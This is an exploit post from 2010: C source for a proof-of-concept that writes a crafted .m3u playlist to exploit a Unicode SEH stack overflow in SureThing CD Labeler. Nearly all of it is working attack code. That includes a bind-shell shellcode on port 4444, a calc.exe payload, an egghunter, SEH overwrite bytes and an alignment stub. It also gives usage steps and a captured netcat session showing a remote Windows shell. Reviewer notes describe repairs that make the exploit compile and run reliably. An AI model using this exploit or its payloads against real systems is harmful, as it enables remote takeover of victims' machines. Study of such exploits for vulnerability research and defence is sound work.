
SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC

Posted on 08 June 2010

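/* surethingcdlabelerbofpoc.c
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SureThing cd labeler (m3u/pls) - unicode stack overflow PoC exploit

Found by:  Ruben Alejandro - chap0
Author:    Steven Seeley - mr_me (http://net-ninja.net/)
Greetz to: Corelan Security Team
           http://www.corelan.be:8800/index.php/security/corelan-team-members/
Writeup:   Unicode, the magic of exploiting 0x00410041
           (https://net-ninja.net/blog/?p=71)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only. Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code. If you do, Corelan cannot
be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
usage: Compile this with lcc-win32 and execute it choosing your shellcode to
create the .m3u file. Then click on 'playlists' --> 'Import Playlist from Hard
Drive' --> 'Import playlist from a file on my computer' --> for filetype select
'Generic m3u/pls file' --> open evil m3u file --> boom.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mrme@backtrack:~$ nc -v 192.168.2.5 4444
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.5] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reviewer notes on this listing:
 - The archived copy lost the backslashes of every "\x.." escape and the
   newlines of the printf() strings; they are restored here.
 - The posted code wrote `nseh`/`seh` while declaring `NSEH`/`SEH` (does not
   compile), and declared them as `char *`, so `sizeof(..) - 1` measured the
   pointer, not the two-byte value, and over-read past the literal. Both are
   now fixed-size arrays like the other payload fragments.
 - fopen()/fwrite()/fclose()/scanf() results were unchecked; a bad menu choice
   silently produced a playlist without any shellcode. Errors are now reported,
   the partial file is removed, and the exit status is non-zero.
 - The bind payload (win32_bind, LPORT=4444) opens an unauthenticated listener
   on every interface of the victim; anyone who can reach TCP/4444 gets the
   shell. Use the calc.exe payload to verify the crash unless the bind shell is
   really needed, and only on hosts you are authorised to test.
 - Per the original comments the target converts the playlist to Unicode
   before the overflow, so every byte of the layout lands as a 16-bit unit;
   the junk sizes, the nSEH/SEH pair and the venetian stub are specific to the
   vulnerable SureThing build they were written against and are reproduced
   unchanged.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Name of the generated playlist (the original's hard-coded output name). */
#define OUTPUT_FILE "cst-surethingcdlabeler.m3u"

/* 'A' (0x41) is used for all filler; unicode-expanded it becomes 0x0041. */
#define JUNK_BYTE 0x41

/* Filler sizes of the original layout; target-specific, see header note. */
enum {
    JUNK_BEFORE_EGGHUNTER = 8,   /* before the egghunter               */
    JUNK_AFTER_EGGHUNTER  = 62,  /* between egghunter and nSEH         */
    JUNK_AFTER_STUB       = 405  /* between the venetian stub and tag  */
};

/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
   http://metasploit.com */
static const unsigned char bind[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
    "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
    "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
    "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
    "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
    "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
    "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
    "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
    "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
    "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
    "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
    "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
    "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
    "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
    "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
    "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
    "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
    "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
    "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
    "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
    "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
    "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
    "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
    "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
    "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
    "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
    "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
    "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
    "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
    "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
    "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
    "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
    "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
    "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
    "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
    "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
    "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
    "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
    "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a";

/* calc.exe payload (benign; prefer this for verifying the crash). */
static const unsigned char calc[] =
    "\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
    "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
    "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
    "\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
    "\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
    "\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
    "\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
    "\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
    "\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
    "\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
    "\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
    "\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
    "\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
    "\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
    "\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
    "\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
    "\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
    "\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
    "\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
    "\x50\x41\x41";

/* Unicode-encoded egghunter (alphanumeric, so it survives the target's
   ANSI -> Unicode expansion). Searches memory for the tag below and jumps
   to whatever follows it. */
static const unsigned char egghunter[] =
    "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ"
    "1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY"
    "AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J"
    "O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA";

/* Venetian shellcode: pop eax, realign it and jump into the egghunter.
   Every other byte is a Unicode-safe "nop" (0x6d) per the original author. */
static const unsigned char getAddressAndAlignEaxThenJmp[] =
    "\x58\x6d\x58\x6d\x58\x6d\x58\x6d\x05\x02\x22\x6d\x2d\x02\x11\x6d"
    "\x2d\x02\x11\x6d\x50\x6d\xc3";

/* Egg tag "w00tw00t" that marks the start of the chosen shellcode. */
static const unsigned char tag[] = "\x77\x30\x30\x74\x77\x30\x30\x74";

/* SEH handler: CALL DWORD PTR SS:[EBP-4] from dwwin.dll (Unicode friendly:
   the two bytes become 0x00730072 after expansion). */
static const unsigned char seh[] = "\x72\x73";

/* nSEH: Unicode-friendly "walk" over the handler slot. */
static const unsigned char nseh[] = "\x41\x6d";

/* Write exactly len bytes from buf to out.
 * Returns 0 on success, -1 on a short write (len == 0 always succeeds). */
static int write_all(FILE *out, const void *buf, size_t len)
{
    if (len == 0) {
        return 0;
    }
    return fwrite(buf, 1, len, out) == len ? 0 : -1;
}

/* Write count copies of byte to out (filler / junk).
 * Returns 0 on success, -1 as soon as a write fails. */
static int write_fill(FILE *out, unsigned char byte, size_t count)
{
    size_t i;
    for (i = 0; i < count; i++) {
        if (fputc(byte, out) == EOF) {
            return -1;
        }
    }
    return 0;
}

/* Ask for the payload once and validate it.
 * Returns 1 (bind shell) or 2 (calc.exe), or -1 if the answer is not a
 * number or not one of the offered options. */
static int read_shellcode_option(void)
{
    int option = 0;

    puts(" [+] Enter shellcode option:");
    puts(" 1. Bindshell on port 4444");
    puts(" 2. Calc.exe");
    if (scanf("%d", &option) != 1) {
        return -1;
    }
    return (option == 1 || option == 2) ? option : -1;
}

/* Build the malicious playlist:
 *   8 x 'A' | egghunter | 62 x 'A' | nSEH | SEH | venetian stub |
 *   405 x 'A' | "w00tw00t" | shellcode
 * argc/argv are unused; the output name is fixed (OUTPUT_FILE).
 * Returns EXIT_SUCCESS when the file was fully written and closed, otherwise
 * EXIT_FAILURE (a partially written file is removed). */
int main(int argc, char *argv[])
{
    FILE *expfle = NULL;
    const unsigned char *shellcode = NULL;
    size_t shellcode_len = 0;
    int option;

    (void)argc;
    (void)argv;

    puts("***************************************************************************");
    puts(" SureThing CD Labeler Unicode stack overflow PoC Exploit");
    puts(" Found by: Ruben Alejandro - chap0");
    puts(" Code by: Steven Seeley - mr_me");
    puts(" http://www.net-ninja.net/");
    puts("***************************************************************************");

    /* Decide on the payload before touching the filesystem so that a bad
       choice leaves nothing behind. */
    option = read_shellcode_option();
    if (option == 1) {
        shellcode = bind;
        shellcode_len = sizeof(bind) - 1;
    } else if (option == 2) {
        shellcode = calc;
        shellcode_len = sizeof(calc) - 1;
    } else {
        fputs(" [-] Invalid shellcode option, nothing written.\n", stderr);
        return EXIT_FAILURE;
    }

    /* Binary mode matters on Windows: the payload contains 0x0a/0x0d bytes. */
    expfle = fopen(OUTPUT_FILE, "wb");
    if (expfle == NULL) {
        perror(" [-] Cannot create the exploit file..");
        return EXIT_FAILURE;
    }

    if (write_fill(expfle, JUNK_BYTE, JUNK_BEFORE_EGGHUNTER) != 0
        || write_all(expfle, egghunter, sizeof(egghunter) - 1) != 0
        || write_fill(expfle, JUNK_BYTE, JUNK_AFTER_EGGHUNTER) != 0
        || write_all(expfle, nseh, sizeof(nseh) - 1) != 0
        || write_all(expfle, seh, sizeof(seh) - 1) != 0
        || write_all(expfle, getAddressAndAlignEaxThenJmp,
                     sizeof(getAddressAndAlignEaxThenJmp) - 1) != 0
        || write_fill(expfle, JUNK_BYTE, JUNK_AFTER_STUB) != 0
        || write_all(expfle, tag, sizeof(tag) - 1) != 0
        || write_all(expfle, shellcode, shellcode_len) != 0) {
        perror(" [-] Write to the exploit file failed");
        goto fail;
    }

    /* fclose() flushes; a failure here means the file on disk is incomplete. */
    if (fclose(expfle) != 0) {
        perror(" [-] Closing the exploit file failed");
        expfle = NULL;
        goto fail;
    }

    printf(" [+] %s created successfully!\n", OUTPUT_FILE);
    return EXIT_SUCCESS;

fail:
    if (expfle != NULL) {
        fclose(expfle);
    }
    remove(OUTPUT_FILE);
    return EXIT_FAILURE;
}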

 
